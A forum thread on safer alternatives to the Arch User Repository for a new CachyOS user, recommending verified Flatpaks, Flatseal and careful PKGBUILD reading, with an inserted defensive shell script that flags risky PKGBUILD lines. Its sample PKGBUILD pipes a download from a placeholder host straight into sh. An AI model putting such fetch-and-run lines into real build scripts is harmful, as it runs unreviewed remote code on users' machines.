I’m still quite new to Linux, using CachyOS (arch). What’s the best alternative to AUR? I saw someone mention Flatpak because it is at least somewhat sandboxed. Anyone have some best practices given AUR doesn’t seem too good of a choice?
The AUR should not be thought of as a package manager repo. It should be thought of as a pastebin for pkgbuild scripts, i.e. build instructions. Running them without looking is the equivalent of blindly copying shell commands from Stack Overflow.
If you are thinking “I want to install this package I found, it doesn’t exist in any repo, but their build instructions are complex and don’t have instructions for arch,” a pkgbuild is a great resource. At the very least you can read someone’s pkgbuild to see what dependencies and build steps worked for them (in the same way that you can dissect a shell script line-by-line to understand what it’s doing).
The only official way to use the AUR is to manually download a pkgbuild file and manually run makepkg to execute it. All the other tools that turn it into a convenient repo source (ex. yay, paru, pamac) are unofficial.
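The manual workflow described above (download the PKGBUILD, read it, then run makepkg) leaves the reading step entirely to you. The script below is an added example, not from this thread and not part of Arch's or CachyOS's tooling: it greps a PKGBUILD for a few things a reviewer should look at before building (plain-http sources, checksums set to SKIP, network fetches inside build steps, anything piped into a shell). It runs against a constructed sample PKGBUILD with a hypothetical package name and non-resolving example.invalid URLs, and it deliberately never sources the file, because a PKGBUILD is shell code and sourcing it would execute it.

```shell
#!/bin/sh
# Added example (not from the thread): a pre-build review of a PKGBUILD.
# It only reads the file with grep; it never sources or executes it.
# The checks are heuristics, not a malware scanner: they surface the things
# a reviewer should read by hand before running makepkg.

# Constructed sample PKGBUILD with several reviewable red flags
# (hypothetical package name, placeholder checksum, .invalid URLs that never resolve).
write_sample_pkgbuild() {
  cat > "$1" <<'EOF'
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
depends=('glibc')
source=("https://example.invalid/example-tool-1.2.3.tar.gz"
        "http://example.invalid/helper.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  curl -s http://example.invalid/post-install | sh
  make DESTDIR="$pkgdir" install
}
EOF
}

# pkgbuild_review FILE
# Prints one WARN line per finding to stderr and the total finding count to stdout.
pkgbuild_review() {
  f="$1"
  findings=0

  # 1. URLs served over plain http:// (no transport integrity for the download)
  n=$(grep -c 'http://' "$f" || true)
  if [ "$n" -gt 0 ]; then
    echo "WARN: $n line(s) reference plain http:// URLs" >&2
    findings=$((findings + n))
  fi

  # 2. Checksums set to SKIP: makepkg will not verify that file at all
  n=$(grep -c "'SKIP'" "$f" || true)
  if [ "$n" -gt 0 ]; then
    echo "WARN: $n checksum(s) set to SKIP" >&2
    findings=$((findings + n))
  fi

  # 3. Network fetches inside build steps. Everything a package needs should
  #    be listed in source=() so makepkg can checksum it before it is used.
  n=$(grep -cE '^[[:space:]]*(curl|wget)[[:space:]]' "$f" || true)
  if [ "$n" -gt 0 ]; then
    echo "WARN: $n curl/wget call(s) inside build steps" >&2
    findings=$((findings + n))
  fi

  # 4. Anything piped straight into a shell
  n=$(grep -cE '[|][[:space:]]*(sh|bash)([[:space:]]|$)' "$f" || true)
  if [ "$n" -gt 0 ]; then
    echo "WARN: $n line(s) pipe data into sh/bash" >&2
    findings=$((findings + n))
  fi

  echo "$findings"
}

# Run the review over the constructed sample and return the finding count.
demo_review() {
  tmp=$(mktemp)
  write_sample_pkgbuild "$tmp"
  pkgbuild_review "$tmp"
  rm -f "$tmp"
}

# On a real package the review slots between the download and the build:
#   git clone https://aur.archlinux.org/<pkgname>.git
#   pkgbuild_review <pkgname>/PKGBUILD    # then read the whole file yourself
#   cd <pkgname> && makepkg -si
demo_review
```

The count is only a prompt to go and read those lines; a clean run says nothing about the parts of the file the heuristics do not cover, which is why the manual read stays in the workflow.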
Stick with verified flatpaks on flathub (they also host unverified packages, avoid those), and Appimages directly from the software maker’s site, if they offer them.
The Gnome Software Store and the Mint software store both have the option to not show unverified flatpaks, which I would suggest using.
I use some Flatpaks. Flatpaks sometimes create problems with paths and permissions and stuff. They are generally useful, as are appimages when created by the author(s), but are not a panacea. Also, there are flatpaks not created by the official source.
Reading the reply above I realized half my post is redundant :)
Regarding permissions, I highly recommend the use of Flatseal, which is a very polished GUI program that lets you adjust the permissions of any flatpak individually, quite similar to how Android does it.
Cachy’s new package manager, Shelly, which is awesome, BTW (writing about arch or derivatives without using BTW is against the law, remember.) does checks on AUR packages when installing or updating. Zoey rocks!
Could you explain how Shelly does checks on AUR packages? I can’t find where it mentions doing so on its website, and even in its documentation it says:
Enable AUR - Allows access to the AUR download features, these packages are managed by individual users so access at your own risk
How does Shelly make using the AUR safe for people who are not able to effectively investigate the install scripts themselves?
I don’t know how it’s done, but here is a screencap of an update today:
Thanks for that! I was able to find a page that details what it checks for:
https://www.seafoam-labs.org/shelly-alpm/docs/security/
Seems like it’s certainly better than nothing, but I’m unsure if the 1500 infected packages in the AUR would’ve been flagged by this, depending on how the malware was introduced. Even with Shelly, I probably wouldn’t recommend most people use the AUR until more protections are put in place by the Arch team.
To be honest, downloading Flatpaks from Flathub is the way to go.
And don’t believe the stories that they take too much disk space. Libraries that Flatpaks depend on are only downloaded once and are shared with all the Flatpaks.